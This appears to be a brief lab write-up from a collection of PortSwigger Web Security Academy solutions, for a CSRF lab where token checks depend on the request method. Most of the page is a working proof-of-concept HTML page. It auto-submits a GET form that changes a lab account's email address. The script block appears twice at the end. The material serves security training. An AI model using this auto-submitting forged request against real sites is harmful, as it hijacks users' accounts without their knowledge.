CSRF where token validation depends on request method
PreviousCSRF vulnerability with no defensesNextCSRF where token validation depends on token being present
Last updated
Last updated
<!DOCTYPE html>
<html lang="en">
<body>
<h1>Form CSRF PoC</h1>
<form method="GET" action="https://0ad10064047185b6805f44eb00e300ff.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="test@test.net">
<input type="hidden" name="csrf" value="S61bjUKLaX12dcJvYc4voGjs357JK2eK">
<input type="submit" value="Submit Request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html> <script>
document.forms[0].submit();
</script>